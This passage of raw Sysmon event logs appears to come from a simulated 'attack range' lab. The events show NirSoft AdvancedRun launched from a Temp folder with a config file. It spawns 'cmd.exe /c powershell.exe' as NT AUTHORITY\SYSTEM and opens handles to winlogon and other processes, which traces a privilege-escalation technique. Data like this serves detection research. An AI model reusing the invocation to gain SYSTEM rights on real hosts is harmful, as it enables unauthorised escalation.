tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004016137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.138{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004015466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004015460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.377{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c powershell.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg 
/runATTACKRANGE\Administrator 10341000x80000000000000004015459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004015446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 